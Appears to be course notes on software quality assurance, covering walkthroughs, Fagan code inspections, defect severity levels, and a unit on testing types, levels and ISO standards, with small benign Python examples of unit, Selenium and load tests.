The rules governing a walkthrough are:

• Provide adequate time
• Use multiple sessions when necessary
• Prepare a set of test cases
• Provide a copy of the program being tested to each team member
• Provide other support materials

The specific goals of a walkthrough depend on its role in the creation of the document. In general the following goals can be applicable:

o to present the document to stakeholders both within and outside the software discipline, in order to gather information regarding the topic under documentation;

o to explain (knowledge transfer) and evaluate the contents of the document;

o to establish a common understanding of the document;
o to examine and discuss the validity of proposed solutions and the viability of alternatives, establishing consensus.

Key characteristics of walkthroughs are:

o The meeting is led by the authors; often a separate scribe is present.
o Scenarios and dry runs may be used to validate the content.
o Separate pre-meeting preparation for reviewers is optional.


Walkthrough:

A method of conducting an informal group/individual review is called a walkthrough. In it, a designer or programmer leads members of the development team and other interested parties through a software product, and the participants ask questions and make comments about possible errors, violations of development standards, and other problems, or may suggest improvements to the article. A walkthrough can be pre-planned or conducted on an as-needed basis, and generally the people working on the work product are involved in the walkthrough process.

The purpose of a walkthrough is to:

· Find problems
· Discuss alternative solutions
· Focus on demonstrating how the work product meets all requirements.

IEEE 1028 recommends three specialist roles in a walkthrough:

Leader: who conducts the walkthrough, handles administrative tasks, and ensures orderly conduct (and who is often the Author).

Recorder: who notes all anomalies (potential defects), decisions, and action items identified during the walkthrough meeting, and normally generates the minutes of meeting at the end of the walkthrough session.

Author: who presents the software product in step-by-step manner at the walk-through meeting, and is probably responsible for completing most action items.

Walkthrough Process:

The author describes the artifact to be reviewed to the reviewers during the meeting. Reviewers present comments, possible defects, and improvement suggestions to the author. The recorder records all defects and suggestions during the walkthrough meeting. Based on reviewer comments, the author performs any necessary rework of the work product if required. The recorder prepares the minutes of the meeting and sends them to the relevant stakeholders. The leader normally monitors the overall walkthrough meeting activities as per the defined company process or responsibilities for conducting the reviews, generally performing monitoring activities and tracking commitments against action items.


Scheduling Walkthroughs

• Walkthroughs should be conducted frequently
  o Focuses on a specific and small piece of work
  o Increases the likelihood of uncovering errors
  o Before the author has too great an ego investment
• Scheduled only when the author is ready
• About 4 or 5 people
• Advance preparation (no more than 2 hours) should be required of and performed by each reviewer

Roles

• Coordinator (Review Leader)
• Author (Producer)
• Reviewers
• Recorder

Conducting Walkthroughs

• Coordinator chairs the meeting
• Walkthrough structure
  o Author's overview?
    Reviewers should be able to understand the product without assistance.
    The author's overview may "brainwash" reviewers into making the same logical errors as did the author.
  o Author's detailed walkthrough
    Based on logical arguments of what the design or code will do at various stages.
  o Requested specific test cases
• Coordinator resolves disagreements when the team cannot reach a consensus

Types of Walkthroughs

• Specification walkthroughs
  o System specification
  o Project planning
  o Requirements analysis
• Design walkthroughs
  o Preliminary design
  o Design
• Code walkthroughs
• Test walkthroughs
  o Test plan
  o Test procedure


• Maintenance reviews

Specification Walkthroughs

• Objective - Check the system specification for:
  o Problems
  o Inaccuracies
  o Ambiguities
  o Omissions
• Participants
  o User
  o Senior analyst
  o Project analysts
• Objects
  o DFDs, Data Dictionary, ERDs, ...

Design Walkthroughs

• Objective - Check the architecture of the design for:
  o Flaws
  o Weaknesses
  o Errors
  o Omissions
• Participants
  o User
  o Analyst
  o Senior designer
  o Project designers
• Objects
  o Structure charts, detailed design documents, ...

Code Walkthroughs

• Objective - Check the code for:
  o Errors
  o Standards violations
  o Lack of clarity
  o Inconsistency
• Participants
  o Author
  o Project programmers
  o Designer
  o Outside programmers
• Objects
  o Code listing, compiler listings, ...


Test Walkthroughs

• Objective - Check the testing documents for:
  o Inadequacy
  o Incompleteness
  o Lack of clarity
• Participants
  o Project programmers
  o Tester
  o Analyst
  o Designer
• Objects
  o Test plan, test procedures, sample test data, ...

What are the benefits of walkthroughs?

There are many benefits; some of them are:

• Consciousness-raising: Senior people get new ideas and insights from junior people.

• Enables observation of different approaches to software analysis, design, and implementation

• "Peer pressure" improves quality • Promotes backup and continuity-Reduces risk of discontinuity & "useless code"

since several people become familiar with parts of software that they may not have otherwise seen


Inspections

The goals of inspection are:

i. It helps the author to improve the quality of the document under inspection
ii. It removes defects efficiently and as early as possible
iii. It improves product quality
iv. It creates common understanding by exchanging information
v. Participants learn from defects found and prevent the occurrence of similar defects

There are various names for the same thing. Some call it software inspection, which also could extend to the design and its documentation; some call it code inspection, which relates more to the source code. A third name is Fagan inspection, named after the person who invented this quality assurance and testing method. Code inspections are a highly efficient test method which cannot be substituted by any other test method. It is time consuming, but according to statistics it will find up to 80% of the contained faults if done properly. However, it all depends on the methods and checks applied and on the diligence of the inspectors. It must not be confused with the so-called "code review" or "walkthrough," which is usually done in a single meeting lasting for a couple of hours. A proper code inspection may take several days and needs the help of tools to browse the symbols in order to find the places where they are used. Proper inspections can be applied to almost all work products in the software life cycle. At first glance they may look very time consuming, but statistical evaluations have shown that over the whole life cycle of the software development they actually save resources, and thus money, and improve the quality of the product.

Benefits

Increase the quality of products

Decrease the time and cost to develop and maintain products

Ensure the completeness and integrity of the overall software package


Code inspections are the most formal type of review meeting. The sole purpose of an inspection is to find defects in a document.

The generally accepted goals of inspection are to:

* help the author to improve the quality of the document under inspection
* remove defects efficiently, as early as possible
* improve product quality, by producing documents with a higher level of quality
* create a common understanding by exchanging information among the inspection participants
* train new employees in the organization's development process
* learn from defects found and improve processes in order to prevent recurrence of similar defects
* sample a few pages or sections from a larger document in order to measure the typical quality of the document, leading to improved work by individuals in the future, and to process improvements.

Key characteristics of an inspection are:

* It is usually led by a trained moderator (certainly not by the author).
* It uses defined roles during the process.
* It involves peers to examine the product.
* Rules and checklists are used during the preparation phase.
* A separate preparation is carried out during which the product is examined and the defects are found.
* The defects found are documented in a logging list or issue log.
* A formal follow-up is carried out by the moderator applying exit criteria.
* Optionally, a causal analysis step is introduced to address process improvement issues and learn from the defects found.
* Metrics are gathered and analyzed to optimize the process.



Inspections can be used to review planning documents, requirements, designs, or code; in short, any work product that a development team produces. Code inspections have specific rules regarding how many lines of code to review at once, how long the review meeting must be, and how much preparation each member of the review team should do, among other things. Inspections are typically used by larger organizations because they take more time and effort than walkthroughs or code reviews. They are also used for mission- and safety-critical software where defects can cause harm to users. The most widely known inspection methodology was invented by Michael Fagan in 1976. Fagan's process was the first formal software inspection process proposed and, as such, has been very influential. Most organizations that use inspections use a variation of the original Fagan software code inspection process. Code inspections have several very important criteria, including:

• Inspections use checklists of common error types to focus the inspectors.

• The focus of the inspection meeting is solely on finding errors; no solutions are permitted.

• Reviewers are required to prepare beforehand; the inspection meeting will be canceled if everyone isn't ready.

• Each participant in the inspection has a distinct role.

• All participants have had inspection training.

• The moderator is not the author and has had special training in addition to the regular inspection training.

• The author is always required to follow up on errors reported in the meeting with the moderator.

• Metrics data is always collected at an inspection meeting.

Inspection Roles

The following are the roles used in code inspections:

• Moderator: The moderator gets all the materials from the author, decides who the other participants in the inspection should be, and is responsible for sending out all the inspection materials and scheduling and coordinating the meeting. Moderators must be technically competent; they need to understand the inspection materials and keep the meeting on track. The moderator schedules the inspection meeting and sends out the checklist of common errors for the reviewers to peruse. They also follow up with the author on any errors found in the inspection, so they must understand the errors and the corrections. Moderators attend an additional inspection-training course to help them prepare for their role.


• Author: The author distributes the inspection materials to the moderator. If an Overview meeting is required, the author chairs it and explains the overall design to the reviewers. Overview meetings are discouraged in code inspections, because they can "taint the evidence" by injecting the author's opinions about the code and the design before the inspection meeting. Sometimes, however, if many of the reviewers are not familiar with the project, an Overview meeting is necessary. The author is also responsible for all rework that is created as a result of the inspection meeting. During the inspection the author answers questions about the code from the reviewers, but does nothing else.

• Reader: The reader's role is to read the code. Actually, the reader is supposed to paraphrase the code, not read it. This implies that the reader has a good understanding of the project, its design, and the code in question. The reader does not explain the code; he just paraphrases it. The author should answer any questions about the code. That said, if the author has to explain too much of the code, that is usually considered a defect to be fixed; the code should be refactored to make it simpler.

• Reviewers: The reviewers do the heavy lifting in the inspection. A reviewer can be anyone with an interest in the code who is not the author. Normally reviewers are other developers from the same project. As in code reviews, it's usually a good idea to have a senior person who is not on the project also be a reviewer. There are usually between two and four reviewers in an inspection meeting. Reviewers must do their pre-reading of the inspection materials and are expected to come to the meeting with a list of errors that they have found. This list is given to the Recorder.

• Recorder: Every inspection meeting has a recorder. The recorder is one of the reviewers and is the person who takes notes at the inspection meeting. The recorder merges the defect lists of the reviewers and classifies and records errors found during the meeting. The recorder prepares the inspection report and distributes it to the meeting participants. If the project is using a defect management system, then it is up to the Recorder to enter defect reports for all major defects from the meeting into the system.

• Managers: As with code reviews, managers are not invited to code inspections.

Inspection Phases and Procedures

Fagan inspections have seven phases that must be followed for each inspection:

1. Planning

2. The Overview meeting

3. Preparation


4. The Inspection meeting

5. The Inspection report

6. Rework

7. Follow up

Planning

In the Planning phase, the moderator organizes and schedules the meeting and picks the participants. The moderator and the author get together to discuss the scope of the inspection materials – for code inspections, typically between 200 and 500 uncommented lines of code will be reviewed. The author then distributes the code to be inspected to the participants.

The Overview Meeting

An Overview meeting is necessary if several of the participants are unfamiliar with the project or its design and need to come up to speed before they can effectively read the code. If an Overview meeting is necessary, the author will call it and run the meeting. The meeting itself is mostly a presentation by the author of the project architecture and design. As mentioned, Overview meetings are discouraged, because they have a tendency to taint the evidence. Like the Inspection meeting itself, Overview meetings should last no longer than two hours.

Preparation

In the Preparation phase, each reviewer reads the work to be inspected. Preparation should take no more than 2–3 hours. The amount of work to be inspected should be between 200 and 500 uncommented lines of code or between 30 and 80 pages of text. A number of studies have shown that reviewers can typically review about 125–200 lines of code per hour. In Fagan inspections, the preparation phase is required; the inspection meeting can be canceled if the reviewers have not done their preparation. The amount of time each reviewer spent in preparation is one of the metrics that is gathered at the inspection meeting.
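As a quick sanity check on these numbers, the short Python sketch below translates the cited review rates into preparation hours. The 125–200 lines/hour range comes from the studies mentioned above; the 400-line package size is an assumption for illustration.

# Rough preparation-time estimate for an inspection package.
lines_to_inspect = 400          # hypothetical package size (uncommented LOC)
low_rate, high_rate = 125, 200  # lines reviewed per hour, per the studies above

print(f"Preparation: {lines_to_inspect / high_rate:.1f} "
      f"to {lines_to_inspect / low_rate:.1f} hours")
# -> Preparation: 2.0 to 3.2 hours, in line with the 2-3 hour guideline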

The Inspection Meeting

The moderator is in charge of the Inspection meeting. Her job during the meeting is to keep the meeting on track and focused. The Inspection meeting should last no more than two hours. If there is any material that has not been inspected at the end of that time, a new meeting is scheduled. At the beginning of the meeting, the reviewers turn in their lists of previously discovered errors to the recorder.

During the meeting the reader paraphrases the code and the reviewers follow along. The author is there to clarify any details and answer any questions about the code and otherwise does nothing. The recorder writes down all the defects reported, their severity and their classification. Solutions to problems are strongly discouraged. Participants are encouraged to have a different meeting to discuss solutions.


We should look for a minute at defect types and severity as reported in a Fagan inspection. Fagan specifies only two types of defects: minor and major. Minor defects are typically typographic errors, errors in documentation, small user interface errors, and other miscellany that doesn't cause the software to fail. All other errors are major defects. This is a bit extreme; two levels are usually not sufficient for most development organizations. Most organizations will have at least a five-level defect structure:

1. Fatal: Yes, your program dies; can you say core dump?

2. Severe: A major piece of functionality fails and there is no workaround for the user. Say that in a first-person shooter game, the software doesn't allow you to re-load your main weapon and doesn't let you switch weapons in the middle of a fight. That's bad.

3. Serious: The error is severe, but with a workaround for the user. The software doesn't let you re-load your main weapon, but if you switch weapons and then switch back you can re-load.

4. Trivial: A small error, either wrong documentation or something like a minor user interface problem. For example, a text box is 10 pixels too far from its prompt in a form.

5. Feature request: A brand new feature for the program is desired. This isn't an error; it's a request from the user (or marketing) for new functionality in the software. In a game this could be new weapons, new character types, new maps or surroundings, and so on. This is version 2.

In most organizations, software is not allowed to ship to a user with known severity 1 and 2 errors still in it. But severity 3 errors really make users unhappy, so realistically, no known severity 1 through 3 errors are allowed to ship. Ideally, of course, no errors ship, right?

In a Fagan inspection meeting it is usually up to the recorder to correctly classify the severity of the major defects found in the code. This classification can be changed later. In the Fagan inspection process all severity 1 through 3 defects are required to be fixed.
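To make the shipping rule concrete, here is a minimal Python sketch. The enum values mirror the five-level structure above, while the ok_to_ship helper and its name are illustrative assumptions, not part of Fagan's process.

from enum import IntEnum

class Severity(IntEnum):
    FATAL = 1
    SEVERE = 2
    SERIOUS = 3
    TRIVIAL = 4
    FEATURE_REQUEST = 5

def ok_to_ship(open_defects):
    # Ship gate: no known severity 1-3 defects may remain open.
    return all(d > Severity.SERIOUS for d in open_defects)

print(ok_to_ship([Severity.TRIVIAL, Severity.FEATURE_REQUEST]))  # True
print(ok_to_ship([Severity.SERIOUS, Severity.TRIVIAL]))          # False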

Inspection Report

Within a day of the meeting, the recorder distributes the Inspection report to all participants. The central part of the report is the list of defects that were found in the code at the meeting.

The report also includes metrics data (a small sketch of such a metrics record follows the list), including:

• The number of defects found

• The number of each type of defect by severity and type

• The time spent in preparation; total time in person-hours and time per participant

• The time spent in the meeting; clock time and total person-hours

• The number of uncommented lines of code or pages reviewed
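As promised above, here is a minimal sketch of what such a report record might look like in code; the field names and the defects-per-KLOC metric are illustrative assumptions, not a prescribed format.

from dataclasses import dataclass

@dataclass
class InspectionReport:
    defects_found: int
    prep_person_hours: float
    meeting_person_hours: float
    lines_reviewed: int

    def defects_per_kloc(self) -> float:
        # Normalizing by size makes inspections of different scope comparable.
        return 1000 * self.defects_found / self.lines_reviewed

report = InspectionReport(defects_found=12, prep_person_hours=9.5,
                          meeting_person_hours=8.0, lines_reviewed=400)
print(f"{report.defects_per_kloc():.0f} defects/KLOC")  # -> 30 defects/KLOC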


Rework and Follow Up

The author fixes all the severity 1 through 3 defects found during the meeting. If enough defects were found, or if enough refactoring or code changes had to occur, then another inspection is scheduled. How much is enough? Amounts vary. McConnell says 5% of the code, but this author has typically used 10% of the code inspected. So if you inspected 200 lines of code and you had to change 20 or more of them in the rework, then you should have another inspection meeting. If it's less than 10%, the author and the moderator can do a walkthrough. Regardless of how much code is changed, the moderator must check all the changes as part of the follow-up. As part of the rework, another metric should be reported: the amount of time required by the author to fix each of the defects reported. This metric, plus the number of defects found during the project, is critical to doing accurate planning and scheduling for the next project. This metric is easier to keep track of if developers use a defect tracking system.
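The 10% rule of thumb is easy to mechanize. A minimal sketch, with the threshold and the helper name as illustrative assumptions:

def needs_reinspection(lines_inspected, lines_changed, threshold=0.10):
    # Reinspect when rework touched at least `threshold` of the inspected code.
    return lines_changed / lines_inspected >= threshold

print(needs_reinspection(200, 20))  # True  -> schedule another inspection
print(needs_reinspection(200, 12))  # False -> a moderator walkthrough suffices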

Summary of Review Methodologies

Table 15-1 summarizes the characteristics of the three review methodologies we've examined. Each has its place, and you should know how each of them works. The important thing to remember is that reviews and testing go hand in hand, and both should be used to get high-quality code out the door.

Table 15-1. Comparison of Review Methodologies

Property                        | Walkthrough | Code Review      | Code Inspection
Formal moderator training       | No          | No               | Yes
Distinct participant roles      | No          | Yes              | Yes
Who drives the meeting          | Author      | Author/moderator | Moderator
Common error checklists         | No          | Maybe            | Yes
Focused review effort           | No          | Yes              | Yes
Formal follow-up                | No          | Maybe            | Yes
Detailed defect feedback        | Incidental  | Yes              | Yes
Metrics data collected and used | No          | Maybe            | Yes
Process improvements            | No          | No               | Yes


UNIT III - TEST GENERATION

Software testing

Testing is the process of evaluating a system or its component(s) with the intent to find whether it satisfies the specified requirements or not.

Testing is executing a system in order to identify any gaps, errors, or missing requirements contrary to the actual requirements.

It involves the execution of a software component or system to evaluate one or more properties of interest. In general, these properties indicate the extent to which the component or system under test:

• meets the requirements that guided its design and development,
• responds correctly to all kinds of inputs,
• performs its functions within an acceptable time,
• is sufficiently usable,
• can be installed and run in its intended environments, and
• achieves the general result its stakeholders desire.

What is testing?

Testing is the process of evaluating a system or its component(s) with the intent to find whether it satisfies the specified requirements or not. This activity produces the actual results, the expected results, and the difference between them. In simple words, testing is executing a system in order to identify any gaps, errors, or missing requirements contrary to the actual requirements.

According to the ANSI/IEEE 1059 standard, testing can be defined as "a process of analyzing a software item to detect the differences between existing and required conditions (that is, defects/errors/bugs) and to evaluate the features of the software item."

Who does testing?


It depends on the process and the associated stakeholders of the project(s). In the IT industry, large companies have a team with responsibilities to evaluate the developed software in the context of the given requirements. Moreover, developers also conduct testing, which is called unit testing. In most cases, the following professionals are involved in testing a system within their respective capacities:

• Software Tester
• Software Developer
• Project Lead/Manager
• End User

Different companies have different designations for people who test the software on the basis of their experience and knowledge, such as Software Tester, Software Quality Assurance Engineer, QA Analyst, etc.

Testing cannot be done at just any time during the software's life cycle. The next two sections state when testing should be started and when it should end during the SDLC.

When to Start Testing?

An early start to testing reduces the cost and time of rework and helps deliver error-free software to the client. In the Software Development Life Cycle (SDLC), testing can start from the Requirements Gathering phase and continue till the deployment of the software. However, it also depends on the development model being used. For example, in the Waterfall model, formal testing is conducted in the Testing phase; but in the incremental model, testing is performed at the end of every increment/iteration, and the whole application is tested at the end.

Testing is done in different forms at every phase of the SDLC. During the Requirements Gathering phase, the analysis and verification of requirements is also considered testing. Reviewing the design in the design phase, with the intent to improve the design, is also considered testing. Testing performed by a developer on completion of the code is categorized as unit testing.

When to Stop Testing?

Unlike deciding when to start testing, it is difficult to determine when to stop testing, as testing is a never-ending process and no one can claim that any software is 100% tested. The following aspects should be considered when deciding to stop testing:

• Testing deadlines.
• Completion of test case execution.
• Completion of functional and code coverage to a certain point.
• Bug rate falls below a certain level and no high-priority bugs are identified.
• Management decision.


Verification & Validation

These two terms are confusing for many people, who use them interchangeably. Let's discuss them briefly.

Testing, Quality Assurance and Quality Control

Most people are confused about the concepts of, and the differences between, Quality Assurance, Quality Control, and Testing. Although they are interrelated and at some level can be considered the same activities, there are indeed differences between them.


Audit and Inspection

Audit:

A systematic process to determine how the actual testing process is conducted within an organization or a team. Generally, it is an independent examination of the processes involved in testing the software. As per IEEE, it is a review of documented processes to check whether the organization implements and follows them. Types of audit include the legal compliance audit, internal audit, and system audit.

Inspection:

A formal technique involving technical reviews, formal or informal, of any artifact to identify errors or gaps. As per IEEE94, inspection is a formal evaluation technique in which software requirements, design, or code are examined in detail by a person or group other than the author to detect faults, violations of development standards, and other problems.

Formal inspection meetings may follow this process: planning, overview, preparation, inspection meeting, rework, and follow-up.

Testing and Debugging

Testing:

It involves identifying bugs/errors/defects in the software without correcting them. Normally, professionals with a quality assurance background are involved in the identification of bugs. Testing is performed in the testing phase.

Debugging:

It involves identifying, isolating, and fixing the problems/bugs. Developers who code the software conduct debugging upon encountering an error in the code. Debugging is part of white box or unit testing. It can be performed in the development phase while conducting unit testing, or in later phases while fixing reported bugs.

Software Testing ISO Standards

Many organizations around the globe develop and implement different standards to improve the quality of their software. This section briefly describes some of the widely used standards related to quality assurance and testing.


ISO/IEC 9126

This standard deals with the following aspects to determine the quality of a software application:

• Quality model
• External metrics
• Internal metrics
• Quality in use metrics

This standard presents a set of quality attributes for any software, such as:

• Functionality
• Reliability
• Usability
• Efficiency
• Maintainability
• Portability

The above-mentioned quality attributes are further divided into sub-factors, which you can study when you go into the details of the standard.

ISO/IEC 9241-11

Part 11 of this standard deals with the extent to which a product can be used by specified users to achieve specified goals with Effectiveness, Efficiency and Satisfaction in a specified context of use.

This standard proposes a framework that describes the usability components and the relationships between them. In this standard, usability is considered in terms of user performance and satisfaction. According to ISO 9241-11, usability depends on the context of use, and the level of usability will change as the context changes.

ISO/IEC 25000:2005

ISO/IEC 25000:2005 is commonly known as the standard that provides guidelines for Software product Quality Requirements and Evaluation (SQuaRE). This standard helps in organizing and enhancing the processes related to software quality requirements and their evaluation. In effect, ISO 25000 replaces the two older ISO standards, ISO 9126 and ISO 14598.

SQuaRE is divided into sub-parts such as:

• ISO 2500n - Quality Management Division
• ISO 2501n - Quality Model Division
• ISO 2502n - Quality Measurement Division
• ISO 2503n - Quality Requirements Division
• ISO 2504n - Quality Evaluation Division

The main contents of SQuaRE are:

• Terms and definitions
• Reference models
• General guide
• Individual division guides
• Standards related to requirements engineering (i.e., specification, planning, measurement, and evaluation process)

ISO/IEC 12119

This standard deals with software packages delivered to the client. It does not focus on the client's production process. The main contents are related to the following items:

• Set of requirements for software packages.
• Instructions for testing the delivered software package against the requirements.

Software Testing Types

This section describes the different types of testing that may be used to test software during the SDLC.

Manual testing

This type includes testing the software manually, i.e., without using any automated tool or script. In this type, the tester takes on the role of an end user and tests the software to identify any unexpected behavior or bugs. There are different stages of manual testing, such as unit testing, integration testing, system testing, and user acceptance testing.

Testers use test plans, test cases, or test scenarios to test the software and to ensure the completeness of testing. Manual testing also includes exploratory testing, as testers explore the software to identify errors in it.

Automation testing

Automation testing, which is also known as test automation, is when the tester writes scripts and uses other software to test the software. This process involves the automation of a manual process. Automation testing is used to re-run, quickly and repeatedly, test scenarios that were performed manually.

Apart from regression testing, automation testing is also used to test the application from the load, performance, and stress points of view. It increases test coverage, improves accuracy, and saves time and money in comparison to manual testing.

What to automate?

It is not possible to automate everything in the software; however, areas where users can make transactions, such as the login form or registration forms, and any area where a large number of users can access the software simultaneously, should be automated.

Furthermore, all GUI items, connections with databases, field validations, etc. can be efficiently tested by automating the manual process.

When to automate?

Test automation should be used after considering the following aspects of the software:

• Large and critical projects.
• Projects that require testing the same areas frequently.
• Requirements not changing frequently.
• Accessing the application for load and performance with many virtual users.
• Stable software with respect to manual testing.
• Availability of time.

How to automate?

Automation is done by using a supportive computer language like VBScript and an automated software application. There are a lot of tools available that can be used to write automation scripts; a short login-form sketch follows the process list below. Before mentioning the tools, let us identify the process that can be used to automate the testing:

• Identifying areas within the software for automation.
• Selection of the appropriate tool for test automation.
• Writing test scripts.
• Development of test suites.
• Execution of scripts.
• Creation of result reports.
• Identification of any potential bugs or performance issues.
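For illustration, here is a minimal login-form automation sketch using Selenium WebDriver in Python; the page URL, field names, and element ID are hypothetical, and a real suite would wrap this in a test framework with reporting.

from selenium import webdriver
from selenium.webdriver.common.by import By

driver = webdriver.Chrome()
try:
    driver.get("https://example.com/login")   # hypothetical system under test
    driver.find_element(By.NAME, "username").send_keys("testuser")
    driver.find_element(By.NAME, "password").send_keys("s3cret")
    driver.find_element(By.ID, "login").click()
    # The assertion is the test: an unexpected page title is a defect.
    assert "Dashboard" in driver.title, "login did not reach the dashboard"
finally:
    driver.quit()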

Software testing tools

The following are tools that can be used for automation testing:

• HP QuickTest Professional
• Selenium
• IBM Rational Functional Tester
• SilkTest
• TestComplete
• Testing Anywhere
• WinRunner
• LoadRunner
• Visual Studio Test Professional
• WATIR

Software Testing Methods

There are different methods that can be used for software testing. This section briefly describes those methods.

Black Box Testing

The technique of testing without having any knowledge of the interior workings of the application is Black Box testing. The tester is oblivious to the system architecture and does not have access to the source code. Typically, when performing a black box test, a tester will interact with the system's user interface by providing inputs and examining outputs without knowing how and where the inputs are worked upon.


White Box Testing

White box testing is the detailed investigation of the internal logic and structure of the code. White box testing is also called glass box testing or open box testing. In order to perform white box testing on an application, the tester needs to possess knowledge of the internal working of the code.

The tester needs to have a look inside the source code and find out which unit/chunk of the code is behaving inappropriately.

Grey Box Testing

Grey box testing is a technique to test the application with limited knowledge of its internal workings. In software testing, the phrase "the more you know, the better" carries a lot of weight when testing an application.

Mastering the domain of a system always gives the tester an edge over someone with limited domain knowledge. Unlike black box testing, where the tester only tests the application's user interface, in grey box testing the tester has access to design documents and the database. Having this knowledge, the tester is able to better prepare test data and test scenarios when making the test plan.


Levels of Software Testing

There are different levels in the process of testing. This section provides a brief description of these levels.

Levels of testing include the different methodologies that can be used while conducting software testing. The main levels of software testing are:

• Functional Testing
• Non-Functional Testing

Functional Testing

This is a type of black box testing that is based on the specifications of the software to be tested. The application is tested by providing input, and the results are then examined to confirm that they conform to the functionality the software was intended to provide. Functional testing of the software is conducted on a complete, integrated system to evaluate the system's compliance with its specified requirements.

There are five steps involved when testing an application for functionality: identifying the functionality that the application is meant to perform; creating test data based on the application's specifications; determining the expected output based on the test data and the specifications; executing the test cases; and comparing the actual and expected results.

An effective testing practice applies these steps to the testing policies of every organization, and hence makes sure that the organization maintains the strictest of standards when it comes to software quality.

Unit Testing

This type of testing is performed by developers before the build is handed over to the testing team to formally execute the test cases. Unit testing is performed by the respective developers on the individual units of source code in their assigned areas. The developers use test data that is separate from the test data of the quality assurance team.


The goal of unit testing is to isolate each part of the program and show that individual parts are correct in terms of requirements and functionality.
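For illustration, here is a minimal sketch using Python's built-in unittest module; the discount() function is a hypothetical unit under test.

import unittest

def discount(price, percent):
    if not 0 <= percent <= 100:
        raise ValueError("percent must be between 0 and 100")
    return price * (1 - percent / 100)

class DiscountTests(unittest.TestCase):
    def test_normal_case(self):
        self.assertAlmostEqual(discount(200.0, 10), 180.0)

    def test_rejects_invalid_percent(self):
        # The unit is tested in isolation, including its error handling.
        with self.assertRaises(ValueError):
            discount(200.0, 150)

if __name__ == "__main__":
    unittest.main()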

Limitations of Unit Testing

Testing cannot catch each and every bug in an application; it is impossible to evaluate every execution path in any non-trivial software application. The same is the case with unit testing.

There is a limit to the number of scenarios and the amount of test data that a developer can use to verify the source code. After exhausting all reasonable options, there is no choice but to stop unit testing and merge the code segment with other units.

Integration Testing

The testing of combined parts of an application to determine whether they function correctly together is integration testing. There are two main methods of integration testing: bottom-up integration testing and top-down integration testing.

In a comprehensive software development environment, bottom-up testing is usually done first, followed by top-down testing. The process concludes with multiple tests of the complete application, preferably in scenarios designed to mimic those it will encounter on customers' computers, systems, and networks.

System Testing

This is the next level of testing; it tests the system as a whole. Once all the components are integrated, the application as a whole is tested rigorously to verify that it meets the specified quality standards. This type of testing is performed by a specialized testing team.

System testing is so important because of the following reasons:

• System Testing is the first step in the Software Development Life Cycle, where the application is tested as a whole.

• The application is tested thoroughly to verify that it meets the functional and technical specifications.


• The application is tested in an environment which is very close to the production environment where the application will be deployed.

• System Testing enables us to test, verify and validate both the business requirements as well as the Applications Architecture.

Regression Testing

Whenever a change is made in a software application, it is quite possible that other areas within the application have been affected by the change. Regression testing verifies that a fixed bug has not resulted in another functionality or business rule violation. The intent of regression testing is to ensure that a change, such as a bug fix, does not result in another fault being uncovered in the application.

Regression testing is so important because of the following reasons:

• It minimizes gaps in testing when an application with changes has to be tested.
• It tests the new changes to verify that the changes made did not affect any other area of the application.
• It mitigates risks when regression testing is performed on the application.
• Test coverage is increased without compromising timelines.
• It increases the speed to market of the product.

Acceptance Testing

This is arguably the most important type of testing, as it is conducted by the Quality Assurance Team, who will gauge whether the application meets the intended specifications and satisfies the client's requirements. The QA team will have a set of pre-written scenarios and test cases that will be used to test the application.

More ideas will be shared about the application, and more tests can be performed on it to gauge its accuracy and the reasons why the project was initiated. Acceptance tests are not only intended to point out simple spelling mistakes, cosmetic errors, or interface gaps, but also to point out any bugs in the application that will result in system crashes or major errors in the application.

By performing acceptance tests on an application the testing team will deduce how the application will perform in production. There are also legal and contractual requirements for acceptance of the system.

Alpha Testing

This test is the first stage of testing and will be performed among the teams (developer and QA teams). Unit testing, integration testing, and system testing, when combined, are known as alpha testing. During this phase, the following will be tested in the application:


• Spelling mistakes
• Broken links
• Cloudy directions
• The application will be tested on machines with the lowest specification to test loading times and any latency problems.

Beta Testing

This test is performed after alpha testing has been successfully completed. In beta testing, a sample of the intended audience tests the application; beta testing is also known as pre-release testing. Beta test versions of software are ideally distributed to a wide audience on the Web, partly to give the program a "real-world" test and partly to provide a preview of the next release. In this phase, the audience will be testing the following:

• Users will install and run the application and send their feedback to the project team.
• Typographical errors, confusing application flow, and even crashes.
• Using the feedback, the project team can fix the problems before releasing the software to the actual users.
• The more issues you fix that solve real user problems, the higher the quality of your application will be.
• Having a higher-quality application when you release it to the general public will increase customer satisfaction.

Non-Functional Testing

This section covers testing the application for its non-functional attributes. Non-functional testing involves testing the software against requirements that are non-functional in nature but equally important, such as performance, security, and user interface.

Some of the important and commonly used non-functional testing types are described below.

Performance Testing

It is mostly used to identify bottlenecks or performance issues rather than to find bugs in the software. Different causes contribute to lowering the performance of software:

• Network delay.
• Client-side processing.
• Database transaction processing.
• Load balancing between servers.
• Data rendering.


Performance testing is considered an important and mandatory testing type with respect to the following aspects:

• Speed (i.e., response time, data rendering, and accessing)
• Capacity
• Stability
• Scalability

It can be either a qualitative or a quantitative testing activity and can be divided into different subtypes such as load testing and stress testing.

Load Testing

Load testing is the process of testing the behavior of the software by applying the maximum load, in terms of the software accessing and manipulating large input data. It can be done at both normal and peak load conditions. This type of testing identifies the maximum capacity of the software and its behavior at peak time.

Most of the time, load testing is performed with the help of automated tools such as LoadRunner, AppLoader, IBM Rational Performance Tester, Apache JMeter, Silk Performer, Visual Studio Load Test, etc.

Virtual users (VUsers) are defined in the automated testing tool, and a script is executed to carry out the load testing of the software. The number of virtual users can be increased or decreased concurrently or incrementally, based upon the requirements.
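As a toy illustration of the idea (not a replacement for the tools above), the sketch below fires a batch of concurrent "virtual users" at a hypothetical URL using only the Python standard library and reports the elapsed time and failure count; real load tools add ramp-up, think time, and per-request statistics.

import time
from concurrent.futures import ThreadPoolExecutor
from urllib.request import urlopen

URL = "https://example.com/"   # hypothetical system under test
VUSERS = 50                    # number of concurrent virtual users

def one_request(_):
    with urlopen(URL, timeout=10) as resp:
        return resp.status

start = time.perf_counter()
with ThreadPoolExecutor(max_workers=VUSERS) as pool:
    statuses = list(pool.map(one_request, range(VUSERS)))
elapsed = time.perf_counter() - start
print(f"{len(statuses)} requests in {elapsed:.2f}s; "
      f"non-200 responses: {sum(s != 200 for s in statuses)}")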

Stress Testing

This testing type includes testing the software's behavior under abnormal conditions: taking away resources and applying load beyond the actual load limit is stress testing.

The main intent is to test the software by applying load to the system and taking away the resources used by the software, in order to identify the breaking point. This testing can be performed by testing different scenarios, such as:

• Shutdown or restart of network ports randomly.
• Turning the database on or off.
• Running different processes that consume resources such as CPU, memory, and server capacity.

Usability Testing

This section includes different concepts and definitions of usability testing from the software point of view. Usability testing is a black box technique; it is used to identify errors and improvements in the software by observing users during their usage and operation of it.


